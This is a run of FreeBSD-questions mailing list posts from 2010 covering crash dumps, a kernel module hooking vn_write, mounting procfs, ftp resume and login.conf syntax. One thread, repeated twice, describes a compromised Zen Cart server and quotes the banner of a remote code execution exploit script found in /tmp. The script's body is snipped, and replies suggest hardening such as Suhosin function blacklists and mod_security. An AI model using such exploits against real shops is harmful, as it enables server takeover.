Re: System Crash + Firefox-3.5.7
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 31/01/2010 20:14, Jerry wrote: I have been experiencing one or two system crashes a day for over a week now. For no apparent reason, when starting Firefox, the system will freeze for approximately 10 seconds or so, then reboot. This does not happen every-time. It seems to happen maybe every third or forth time, although that is not a proven fact. The /var/crash directory is starting to fill up with crash files -- bounds, vmcore.x info.x and I have no idea what to do with them. Can I just delete them or is there somebody who investigates these spontaneous crashes/reboots. This is happening on a FreeBSD-7.2 machine. Well, unless those files are being used to debug the crashes you're experiencing, then they're pointless. If you're not going to send-pr or bring them to the attention of a developer some other way, you might as well delete them and recover the disk space. Even if you have raised a ticket, there's little or no reason to keep a whole string of crashdumps all showing the same problem. To report this via the PR system, use send-pr(1) and attach the info.x file: this should have sufficient information in it for a developer to start to work on the problem, but they may need you to run a debugger on the kernel image, so keep hold of all the related files while the PR is still active. You should get a response to your PR within a few days, but a fix might take a bit longer. Cheers, Matthew - -- Dr Matthew J Seaman MA, D.Phil. 7 Priory Courtyard Flat 3 PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate Kent, CT11 9PW -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktmiugACgkQ8Mjk52CukIz6jgCfdQ4G8jxpjCpBMFYyfEXk9qb2 viwAn2n/hIz1QIGNeQxXELOqRVZra6xz =KqM2 -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
How can I copy the data of buf in kernel space to the uio structhre in user space.
Hi,
For my research, I am now hooking the function vn_write().
This is the part of the source code.
#include sys/param.h/* module */
#include sys/module.h /* module */
#include sys/kernel.h /* module */
#include sys/types.h/* size_t, copystr */
#include sys/systm.h/* copystr */
#include sys/proc.h /* struct thread*/
#include sys/file.h /* vnops*/
#include fs/msdosfs/msdosfs_vnops.c /* msdosfs_vnodeops */
int
fo_write_hook(struct file *fp,
struct uio *uio,
struct ucred *active_cred,
int flags,
struct thread *td);
typedef int (*fow_t)(struct file*,
struct uio*,
struct ucred*,
int flags,
struct thread*);
fow_t old_fo_write;
static char mybuf[256+1];
static size_t len;
/* vn_write hook */
int
vn_write_hook(struct file *fp,
struct uio *uio,
struct ucred *active_cred,
int flags,
struct thread *td)
{
...
int error;
memset(mybuf, '\0', 257);
error = copyinstr(uio-uio_iov-iov_base, mybuf, 256, len);
if (error != 0) {
uprintf(Cannot write data to kernel space\n);
}
/* encrypt the data by ceaser algorithm */
for (int i = 0; i len ; i++)
mybuf[i] += 3;
error = copystr(mybuf, uio-uio_iov-iov_base, 257, len);
if (error != 0) {
uprintf(Cannot write data to user space\n);
}
...
return (old_vn_write(fp, uio, active_cred, flags, td));
}
This software is implemented as a kernel module.
After I installed this software and execute cp command, vn_write_hook
function is executed.
However, when copystr(mybuf, uio-uio_iov-iov_base, 257, len) is
executed,
kernel goes to panic.
I referenced /usr/share/examples/kld/cdev/module/cdev.c for writing the
part of program
that copies buffer in kernel space to a buf in user space program.
However, as we have seen,
this doesn't work appropriately.
How can I solve this problem?
Please give me your help.
--Jun Furukawa
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist witch will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !
ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php
2010/1/31 James Smallacombe u...@3.am
Whoever speculated that my server may have been compromised was on to
something (see bottom). The good news is, it does appear to be contained to
the www unpriveleged user (with no shell). The bad news is, they can
still cause a lot of trouble. I found the compromised customer site and
chmod 0 their cart (had php binaries called core(some number).php that gave
the hacker a nice browser screen to cause all kinds of trouble)
Not sure if this is related to the UDP floods, but if not, it's a heck of a
coincidence. At times, CPU went through the roof for the www user, mostly
running some sort of perl scripts (nothing in the suexec-log). I would kill
apache, but couldn't restart it as it would show port 80 in use. I would
have to manually kill processes like these:
www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl)
www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl)
www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34
/sbin/klogd -c 1 -x -x (perl)
www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84
I could not find ANY file named klogd on the system, let alone in /sbin.
Clues as to how to dig myself out of this are appreciated
I found this in /tmp/bx1.txt:
--More--(5%)#!/usr/bin/php
?php
#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of
anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc 2)
{
echo
=___ Zen Cart 1.3.8 Remote Code Execution Exploit =
| BlackH bl4c...@gmail.com |
| |
| \$system php $argv[0] url|
| Notes: url ex: http://victim.com/site (no slash) |
| |
;exit(1);
--- snipped --
It is dated from two nights ago, after these issues started, but it's
nonetheless larming. Security Focus is aware of the issue and refers you to
Zen for the fix. Only problem is, this is an old version of Zen cart, and
the
James Smallacombe PlantageNet, Inc. CEO and Janitor
u...@3.am http://3.am
=
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to
freebsd-questions-unsubscr...@freebsd.org
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: VirtualBox doesn't start
On Sun, Jan 31, 2010 at 08:39:49PM +0100, Frank Wi?mann wrote: Hi, Glen! Glen Barber schrieb: 2.) What version of VirtualBox is this? virtualbox-ose-3.1.2 and above do not require procfs(5); lesser versions do. When I try to mount /proc via fstab and mount -u -a I get the following error message: mount: proc : Invalid argument The line in /etc/fstab is as following: proc /proc procfs rw 0 0 procfs /proc procfs rw 0 0 ^^ Something is wrong here, too, but what? Greetings Frank -- GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y? When pack meets pack in the jungle and no one will move from the trail wait till the leaders have spoken it may be fair words shall prevail (Rudyard Kipling) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org !DSPAM:4b65dc85942291048420163! -- Daniel Bye _ ASCII ribbon campaign ( ) - against HTML, vCards and X - proprietary attachments in e-mail / \ ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
Bogdan Webb wrote:
try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist witch will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !
ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php
2010/1/31 James Smallacombe u...@3.am
Whoever speculated that my server may have been compromised was on to
something (see bottom). The good news is, it does appear to be contained to
the www unpriveleged user (with no shell). The bad news is, they can
still cause a lot of trouble. I found the compromised customer site and
chmod 0 their cart (had php binaries called core(some number).php that gave
the hacker a nice browser screen to cause all kinds of trouble)
Not sure if this is related to the UDP floods, but if not, it's a heck of a
coincidence. At times, CPU went through the roof for the www user, mostly
running some sort of perl scripts (nothing in the suexec-log). I would kill
apache, but couldn't restart it as it would show port 80 in use. I would
have to manually kill processes like these:
www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl)
www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl)
www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34
/sbin/klogd -c 1 -x -x (perl)
www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84
I could not find ANY file named klogd on the system, let alone in /sbin.
Clues as to how to dig myself out of this are appreciated
I found this in /tmp/bx1.txt:
--More--(5%)#!/usr/bin/php
?php
#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of
anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#
error_reporting(E_ALL ^ E_NOTICE);
if($argc 2)
{
echo
=___ Zen Cart 1.3.8 Remote Code Execution Exploit =
| BlackH bl4c...@gmail.com |
| |
| \$system php $argv[0] url|
| Notes: url ex: http://victim.com/site (no slash) |
| |
;exit(1);
--- snipped --
It is dated from two nights ago, after these issues started, but it's
nonetheless larming. Security Focus is aware of the issue and refers you to
Zen for the fix. Only problem is, this is an old version of Zen cart, and
the
James Smallacombe PlantageNet, Inc. CEO and Janitor
u...@3.am http://3.am
=
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to
freebsd-questions-unsubscr...@freebsd.org
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
check out port mod_security for apache31 and mod_security2 for apache22
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
FTP using .netrc
Goal is to download the install source directory tree so I can use it as an target for local ftp sysinstall. The problem is that the FreeBSD ftp server keeps timing out before everything is downloaded. This is the error message ftp gives me. 421 Service not available, remote server timed out. Connection closed This is the command line command used to launch the ftp session ftp -v ftp.FreeBSD.org It defaults to using /root/.netrc which is shown below machine ftp.FreeBSD.org login anonymous password f...@home.com macdef init prompt off cd /pub/FreeBSD/releases/i386/8.0-RELEASE epsv4 off mget ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM mget README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css $ getdir base catpages dict doc games info kernels manpages ports proflibs src quit macdef getdir ! mkdir $i mget $i/* Question is how can I make FTP resume the download at the place it timed out. IE not start at the beginning and re-download all the same files all ready received. ftp -vR ftp.FreeBSD.org just starts downloading from the beginning again. I tried testing using fetch -avrpAF ftp://ftp.FreeBSD.org but the /.netrc file is not being defaulted to like when using plan ftp as above. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: FTP using .netrc
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 01/02/2010 10:11, Fbsd1 wrote: machine ftp.FreeBSD.org login anonymous password f...@home.com macdef init prompt off cd /pub/FreeBSD/releases/i386/8.0-RELEASE epsv4 off mget ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM mget README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css $ getdir base catpages dict doc games info kernels manpages ports proflibs src quit macdef getdir ! mkdir $i mget $i/* Question is how can I make FTP resume the download at the place it timed out. IE not start at the beginning and re-download all the same files all ready received. ftp -vR ftp.FreeBSD.org just starts downloading from the beginning again. Change your 'mget' commands into 'mreget' Or just use wget in mirror-mode... Cheers, Matthew - -- Dr Matthew J Seaman MA, D.Phil. 7 Priory Courtyard Flat 3 PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate Kent, CT11 9PW -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktmrGcACgkQ8Mjk52CukIzm9ACghwg5MhvKCSqAca621AKg6It/ iD4An3/4spV6EeaCkizbTyKKRFZRNKeC =dHOF -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: ssh/sshd cores dump
Hi again, I have this weird error since yesterday, one a system that used to be working nicely, suddenly: ssh cores dump when run as non priviledged user, works fine for root sshd aborts on signal 11 I tried to reinstall world, but it is the same. There is openssl installed from the ports on that machine (what port needed it?) as well as ldap/nss_ldap/open_ldap. It seems that the problem started when I tried to upgrade openldap libbrary (openldap-client port). I did a little bit more diging: ssh cores dump on a strcmp, from /lib/libc.so.6; I checked with a working machine, the library are the same; I checked ssh, they are the same. This is very puzzeling. Any clue? The machine is running 6.4-RELEASE-p9 Some information: ufo2on65: uname -a FreeBSD ufo2.cs.ait.ac.th 6.4-RELEASE-p9 FreeBSD 6.4-RELEASE-p9 #0: Fri Jan 29 16:53:47 ICT 2010 r...@ufo2.cs.ait.ac.th:/usr/obj/usr/src/sys/SMP amd64 On the server side, for a username that does not exist: ufo2on66: sudo sshd -ddd -e sshd re-exec requires execution with an absolute path ufo2on67: sudo /usr/sbin/sshd -ddd -e debug2: load_server_config: filename /etc/ssh/sshd_config debug2: load_server_config: done config len = 157 debug2: parse_server_config: config /etc/ssh/sshd_config len 157 debug3: /etc/ssh/sshd_config:111 setting Subsystem sftp /usr/libexec/sftp-server debug1: sshd version OpenSSH_4.5p1 FreeBSD-20061110 debug3: Not a RSA1 key file /etc/ssh/ssh_host_dsa_key. debug1: read PEM private key done: type DSA debug1: private host key: #0 type 2 DSA debug1: rexec_argv[0]='/usr/sbin/sshd' debug1: rexec_argv[1]='-ddd' debug1: rexec_argv[2]='-e' debug2: fd 3 setting O_NONBLOCK debug1: Bind to port 22 on ::. Server listening on :: port 22. debug2: fd 4 setting O_NONBLOCK debug1: Bind to port 22 on 0.0.0.0. Server listening on 0.0.0.0 port 22. Waiting for a connection Connection with a username that does not exist debug1: fd 5 clearing O_NONBLOCK debug1: Server will not fork when running in debugging mode. debug3: send_rexec_state: entering fd = 8 config len 157 debug3: ssh_msg_send: type 0 debug3: send_rexec_state: done debug1: rexec start in 5 out 5 newsock 5 pipe -1 sock 8 debug3: recv_rexec_state: entering fd = 5 debug3: ssh_msg_recv entering debug3: recv_rexec_state: done debug2: parse_server_config: config rexec len 157 debug3: rexec:111 setting Subsystem sftp/usr/libexec/sftp-server debug1: sshd version OpenSSH_4.5p1 FreeBSD-20061110 debug3: Not a RSA1 key file /etc/ssh/ssh_host_dsa_key. debug1: read PEM private key done: type DSA debug1: private host key: #0 type 2 DSA debug1: inetd sockets after dupping: 3, 3 debug1: res_init() Connection from 192.41.170.5 port 63398 debug1: Client protocol version 2.0; client software version OpenSSH_4.5p1 FreeB SD-20061110 debug1: match: OpenSSH_4.5p1 FreeBSD-20061110 pat OpenSSH* debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_4.5p1 FreeBSD-20061110 debug2: fd 3 setting O_NONBLOCK debug2: Network child is on pid 16235 debug3: preauth child monitor started debug3: mm_request_receive entering debug3: privsep user:group 22:22 debug1: permanently_set_uid: 22/22 debug1: list_hostkey_types: ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha256,diffie-hellman-g roup-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1 28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c tr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1 28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c tr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open ssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open ssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,z...@openssh.com debug2: kex_parse_kexinit: none,z...@openssh.com debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha256,diffie-hellman-g roup-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss,ssh-rsa debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1 28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c tr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour1 28,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-...@lysator.liu.se,aes128-c tr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd...@open
A question on syntax in /etc/login.conf
On the page http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html Syntax is shown as: language_name:accounts_title:\ :charset=MIME_charset:\ :lang=locale_name:\ :tc=default: If I look in the file on a newly installed 8.0-RELEASE it shows: russian|Russian Users Accounts:\ :charset=KOI8-R:\ :lang=ru_RU.KOI8-R:\ :tc=default: Is it the colon or pipe sign that is correct? /Leslie ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: A question on syntax in /etc/login.conf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 01/02/2010 11:00, Leslie Jensen wrote: On the page http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html Syntax is shown as: language_name:accounts_title:\ :charset=MIME_charset:\ :lang=locale_name:\ :tc=default: If I look in the file on a newly installed 8.0-RELEASE it shows: russian|Russian Users Accounts:\ :charset=KOI8-R:\ :lang=ru_RU.KOI8-R:\ :tc=default: Is it the colon or pipe sign that is correct? Probably the latter. The '|' symbol is used when there are several alternative names for the same object -- this is not used much in /etc/login.conf, unlike /etc/termcap. By convention, the last name in a list of alternates like this is a comment rather than a tag for actual use. See getcap(3) for details. The first entry is syntactically correct -- 'accounts_title' would be a boolean value (set to true if present, false if absent) -- but the login.conf man page knows nothing of 'accounts_title' and it's a funny name for a boolean. So I guess that's likely to be a typo in the handbook. Cheers, Matthew - -- Dr Matthew J Seaman MA, D.Phil. 7 Priory Courtyard Flat 3 PGP: http://www.infracaninophile.co.uk/pgpkey Ramsgate Kent, CT11 9PW -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktmxgYACgkQ8Mjk52CukIz/bwCcCS1qvkaNJyAaXCEUZA/s+6Nd gsYAn08d8pD7sWTfNh1OGfa3OheejcRj =ERMH -END PGP SIGNATURE- ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: A question on syntax in /etc/login.conf
... Is it the colon or pipe sign that is correct? /Leslie The answer is clearly set forth in login.conf(5): Records in a class capabilities database consist of a number of colon- separated fields. The first entry for each record gives one or more names that a record is to be known by, each separated by a '|' character. The first name is the most common abbreviation. The last name given should be a long name that is more descriptive of the capability entry, and all others are synonyms. All names but the last should be in lower case and contain no blanks; the last name may contain upper case charac- ters and blanks for readability. Note that since a colon (`:') is used to separate capability entries, a `\c' escape sequence must be used to embed a literal colon in the value or name of a capability. When in doubt, look for a manpage (first). b. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: devel/poco-ssl BROKEN. Can I use TRYBROKEN?
On Sun, Jan 31, 2010 at 03:09:26PM -0500, b. f. wrote:
Hi,
devel/poco-ssl has been marked
BROKEN= bad plist
for some time now.
Since I urgently need it for devel work, and as I would prefer
to use the port rather than compile POCO directly (which works
too), I'm considering bypassing this BROKEN setting with:
.if ${.CURDIR:M*/devel/poco-ssl}
TRYBROKEN=yes
.endif
in /etc/make.conf.
Is it okay, until devel/poco-ssl is fixed?
You can do whatever you want on your own system. The reason given
for marking it BROKEN was a bad plist, and if that is the only thing
wrong with it, then you need only worry about it leaving unregistered
files behind after it is removed, or possibly conflicting with another
port. If that's alright with you, then you may as well use NO_IGNORE
or TRYBROKEN as a workaround.
Okay, I've tried it on a test machine, and it seems to work
alright (so far), at least with the few programs I've compiled.
It looks like a bad plist only, and I think that I understand
the ramifications of it, so I'll stick to this workaround until
the port is fixed.
Oh, btw, I'm still missing the poco-doc port which pulls in
the POCO documentation. :-(
Oh, well. If the maintainer won't do it, maybe you could take the
time to fix the plist and offer an option to install the docs?
I'll have a look as soon as I grok the ports system and find
out how to do that. ;-)
Thanks,
-cpghost.
--
Cordula's Web. http://www.cordula.ws/
___
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: A question on syntax in /etc/login.conf
#secure method=pgpmime mode=sign On Mon, 01 Feb 2010 12:00:59 +0100, Leslie Jensen les...@eskk.nu wrote: On the page http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html Syntax is shown as: language_name:accounts_title:\ :charset=MIME_charset:\ :lang=locale_name:\ :tc=default: If I look in the file on a newly installed 8.0-RELEASE it shows: russian|Russian Users Accounts:\ :charset=KOI8-R:\ :lang=ru_RU.KOI8-R:\ :tc=default: Is it the colon or pipe sign that is correct? On Mon, 01 Feb 2010 12:16:06 +, Matthew Seaman m.sea...@infracaninophile.co.uk wrote: Probably the latter. The '|' symbol is used when there are several alternative names for the same object -- this is not used much in /etc/login.conf, unlike /etc/termcap. By convention, the last name in a list of alternates like this is a comment rather than a tag for actual use. See getcap(3) for details. The first entry is syntactically correct -- 'accounts_title' would be a boolean value (set to true if present, false if absent) -- but the login.conf man page knows nothing of 'accounts_title' and it's a funny name for a boolean. So I guess that's likely to be a typo in the handbook. Yes, this is a typo in the Handbook. I just committed a fix for the typo in revision 1.132 of doc/en_US.ISO8859-1/books/handbook/l10n/chapter.sgml revision 1.132 date: 2010/02/01 12:52:51; author: keramida; state: Exp; lines: +2 -2 Fix typo in login.conf example. The aliases for login.conf entries are separated by the main name with a pipe '|', and there is no support for an accounts_type key in the database. Use a whitespace-separated name in the example, to indicate that it's ok to have spaces in login.conf entry aliases. Noticed by: Leslie Jensen, leslie at eskk.nu, Matthew Seaman, m.seaman at infracaninophile.co.uk Thanks for bringing this to our attention :) pgpKvTRasllSK.pgp Description: PGP signature
Re: VirtualBox doesn't start
Hi, Daniel! Daniel Bye schrieb: On Sun, Jan 31, 2010 at 08:39:49PM +0100, Frank Wi?mann wrote: Hi, Glen! Glen Barber schrieb: 2.) What version of VirtualBox is this? virtualbox-ose-3.1.2 and above do not require procfs(5); lesser versions do. When I try to mount /proc via fstab and mount -u -a I get the following error message: mount: proc : Invalid argument The line in /etc/fstab is as following: proc /proc procfs rw 0 0 procfs /proc procfs rw 0 0 ^^ After trying this I still get the message: mount: procfs : Operation not supported And a mount -t procfs /proc/ does the following: usage: mount [-adflpruvw] [-F fstab] [-o options] [-t ufs | external_type] mount [-dfpruvw] special | node mount [-dfpruvw] [-o options] [-t ufs | external_type] special node So, what is wrong with me :-(? Greetings Frank -- GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y? When pack meets pack in the jungle and no one will move from the trail wait till the leaders have spoken it may be fair words shall prevail (Rudyard Kipling) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Help! Upgrade from fbsd 5.4 to 8.x
On Sun, Jan 31, 2010 at 09:33:51AM +0100, Roland Smith typed: On Sat, Jan 30, 2010 at 11:08:05PM -0500, Jeff Mitchell wrote: o Some of the executables on this box are without source but I still need them to run; short of moving them to a VM and doing some voodoo, what are the chances a binary built for fbsd 5.x works fine in 8.x? (earlier fbsd's had the break between gcc versions, but I'm rather The GENERIC kernel in 8.0 comes with the COMPAT_FREEBSD5 option by default, so the only thing you need to do is to install the misc/compat5x port. That is, if the executables weren't dependent on compat[2-4] options in the kernel on the old server ;) 3 - yank the drive, slap a giant new fat drive in there, do a full fbsd 8.0 install, and then migration from old drive as needed Definitely #3. Yes, you could even try coying the entire old disk to a subdirectory and running that as a jail. Should bring you up quickly, giving you more time to migrate all applications proper. Ruben ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: VirtualBox doesn't start
Hi Frank, Frank Wi?mann wrote: After trying this I still get the message: mount: procfs : Operation not supported And a mount -t procfs /proc/ The procfs(5) man page specifies the following: mount -t procfs proc /proc Regards, -- Glen Barber ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: VirtualBox doesn't start
Hi, Glen1 Glen Barber schrieb: Hi Frank, Frank Wi?mann wrote: After trying this I still get the message: mount: procfs : Operation not supported And a mount -t procfs /proc/ The procfs(5) man page specifies the following: mount -t procfs proc /proc Once you make it right, it works. mount: /dev/ad1s1a on / (ufs, local) devfs on /dev (devfs, local, multilabel) /dev/ad0s1d on /home (ufs, local) /dev/ad1s1e on /usr (ufs, local, soft-updates) /dev/ad1s1f on /usr/local (ufs, local, soft-updates) /dev/ad1s1h on /usr/obj (ufs, local, soft-updates) /dev/ad1s2d on /usr/ports (ufs, local, soft-updates) /dev/ad1s1g on /usr/src (ufs, local, soft-updates) /dev/ad1s1d on /var (ufs, local, soft-updates) procfs on /proc (procfs, local) Thank you, folks! But I think I go the way of reinstalling with an updated ports-tree and Qt4 enabled. Greetings Frank -- GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y? When pack meets pack in the jungle and no one will move from the trail wait till the leaders have spoken it may be fair words shall prevail (Rudyard Kipling) ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Help! Upgrade from fbsd 5.4 to 8.x
On Mon, 1 Feb 2010, Ruben de Groot wrote: # The GENERIC kernel in 8.0 comes with the COMPAT_FREEBSD5 option by default, so # the only thing you need to do is to install the misc/compat5x port. # # That is, if the executables weren't dependent on compat[2-4] options in the kernel on the old server ;) Hahahahaha haha h ... erm :/ We'll see :) # Yes, you could even try coying the entire old disk to a subdirectory and # running that as a jail. Should bring you up quickly, giving you more time # to migrate all applications proper. I considered this (or just VMing the whole box), but I'd still be going through to trim out the union of ports (ie: ssh common port etc), so heck with it. I do think I'm going to jail like mad this time through though; ie: stick apache into a jail, stick groupware server into a jail, stick mailing list into a jail, etc; for things that are well defined and should be something considered for peeling to another server some day, just jail them outright from the onset .. better security and help keep me from bleeding lines between services. Good tip :) Not that I've set up a jail before, but nows as good a time as any to learn :) jeff -- If everyone would put barbecue sauce on their food, there would be no war. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: mysql silently failing to start - suggestions?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 John wrote: If this isn't the right list - if I should try another let me know - but since this is the mysql-server-5.4.2 package, and since you folks have been so helpful, I thought I'd give it a go. Anyway, the system is 8.0-RELEASE and that package is installed, and I can't start the server. Not only can I not start the server, but it's not giving me a clue. I can't find anything anywhere. Not in /var/log/messages, not anywhere. When I run /usr/local/etc/rc.d/mysqlserver start it says Starting mysql., pauses for several seconds (I don't see anything go by in top) and then the script exits. At that point, one would expect, there's no /tmp/mysql.sock, there's nothing in messages or anywhere else. With nothing to go on, well, I don't know where to start. Any suggestions? Hi John, If I'm having problems with an rc.d script, I'll invoke it with shell verbosity turned on so I can see exactly what commands are executing. You might try that if the other posted suggestions don't fix the problem. Invoke the script like this: sh -x /usr/local/etc/rc.d/mysqlserver start Hope that helps, Greg - -- Greg Larkin http://www.FreeBSD.org/ - The Power To Serve 